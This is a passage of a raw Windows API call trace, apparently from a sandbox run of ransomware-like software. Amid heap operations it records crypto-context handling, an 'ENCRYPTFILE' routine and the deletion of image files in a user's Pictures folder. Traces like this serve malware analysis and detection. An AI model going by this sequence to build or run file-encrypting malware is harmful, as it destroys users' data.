wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb0c) returned 0 [0094.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0094.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0094.868] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0094.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0094.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0094.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0094.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0094.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0094.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0094.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0094.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0094.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0094.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0094.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0094.868] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0094.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0094.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0094.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac740 | out: hHeap=0x1780000) returned 1 [0094.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0094.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0094.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0094.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0094.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0094.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0094.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0094.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0094.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0094.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0094.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0094.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0094.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0094.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0094.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0094.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0094.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0094.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0094.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0094.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0094.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0094.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0094.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0094.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0094.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0094.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0094.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0094.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0094.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0094.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0094.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0094.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0094.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0094.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0094.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0094.870] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0094.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0094.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0094.870] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0094.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0094.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0094.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7a8 [0094.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0094.870] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0094.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0094.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d58 [0094.871] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0094.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d58 | out: hHeap=0x1780000) returned 1 [0094.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0094.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9e8 [0094.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0094.871] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0094.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0094.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0094.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0094.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0094.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0094.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0094.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0094.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0094.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0094.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca868 [0094.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0094.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa00 [0094.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9d0 [0094.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca820 [0094.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca898 [0094.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8b0 [0094.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7c0 [0094.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0094.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0094.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0094.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0094.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0094.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0094.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0094.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0094.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0094.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0094.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0094.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0094.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0094.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0094.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0094.872] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0094.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0094.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0094.872] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0094.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0094.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0094.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0094.873] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0094.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ab8 | out: hHeap=0x1780000) returned 1 [0094.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0094.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0094.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0094.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0094.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0094.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0094.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0094.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0094.873] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0094.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f50 | out: hHeap=0x1780000) returned 1 [0094.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0094.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0094.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0094.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0094.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0094.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0094.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0094.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0094.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0094.874] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0094.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0094.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0094.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0094.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0094.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0094.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0094.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0094.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0094.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0094.874] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0094.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0094.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0094.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0094.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0094.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0094.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0094.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0094.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0094.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0094.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0094.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0094.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0094.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0094.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796de8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0094.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0094.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0094.875] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0094.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0094.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0094.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0094.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0094.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0094.875] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0094.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0094.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0094.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0094.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0094.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0094.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0094.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0094.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0094.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0094.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0094.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0094.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0094.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0094.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0094.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0094.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0094.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0094.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0094.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0094.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0094.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0094.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0094.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0094.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0094.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0094.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0094.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0094.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0094.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0094.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0094.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0094.877] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0094.877] FreeLibrary (hLibModule=0x756e0000) returned 1 [0094.877] CloseHandle (hObject=0x258) returned 1 [0094.877] CloseHandle (hObject=0x298) returned 1 [0094.880] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\W ZDfbD_wanSc.gif", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\W ZDfbD_wanSc.gif", lpFilePart=0x0) returned 0x31 [0094.880] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\W ZDfbD_wanSc.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\w zdfbd_wansc.gif")) returned 0x20 [0094.880] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\W ZDfbD_wanSc.gif", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f70a7d0, ftCreationTime.dwHighDateTime=0x1d5e782, ftLastAccessTime.dwLowDateTime=0xd4154c50, ftLastAccessTime.dwHighDateTime=0x1d5eda5, ftLastWriteTime.dwLowDateTime=0xd4154c50, ftLastWriteTime.dwHighDateTime=0x1d5eda5, nFileSizeHigh=0x0, nFileSizeLow=0xf2e9, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="W ZDfbD_wanSc.gif", cAlternateFileName="WZDFBD~1.GIF")) returned 0x41ac700 [0094.881] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\W ZDfbD_wanSc.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\w zdfbd_wansc.gif")) returned 1 [0094.889] FindNextFileW (in: hFindFile=0x41ac700, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f70a7d0, ftCreationTime.dwHighDateTime=0x1d5e782, ftLastAccessTime.dwLowDateTime=0xd4154c50, ftLastAccessTime.dwHighDateTime=0x1d5eda5, ftLastWriteTime.dwLowDateTime=0xd4154c50, ftLastWriteTime.dwHighDateTime=0x1d5eda5, nFileSizeHigh=0x0, nFileSizeLow=0xf2e9, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="W ZDfbD_wanSc.gif", cAlternateFileName="WZDFBD~1.GIF")) returned 0 [0094.889] FindClose (in: hFindFile=0x41ac700 | out: hFindFile=0x41ac700) returned 1 [0094.890] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0094.890] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\X0f8JSrsqtdBsB.png", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38d69400, ftCreationTime.dwHighDateTime=0x1d5ee87, ftLastAccessTime.dwLowDateTime=0xcb7e1b10, ftLastAccessTime.dwHighDateTime=0x1d5efeb, ftLastWriteTime.dwLowDateTime=0xcb7e1b10, ftLastWriteTime.dwHighDateTime=0x1d5efeb, nFileSizeHigh=0x0, nFileSizeLow=0x18cd8, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="X0f8JSrsqtdBsB.png", cAlternateFileName="X0F8JS~1.PNG")) returned 0x41ac640 [0094.890] FindClose (in: hFindFile=0x41ac640 | out: hFindFile=0x41ac640) returned 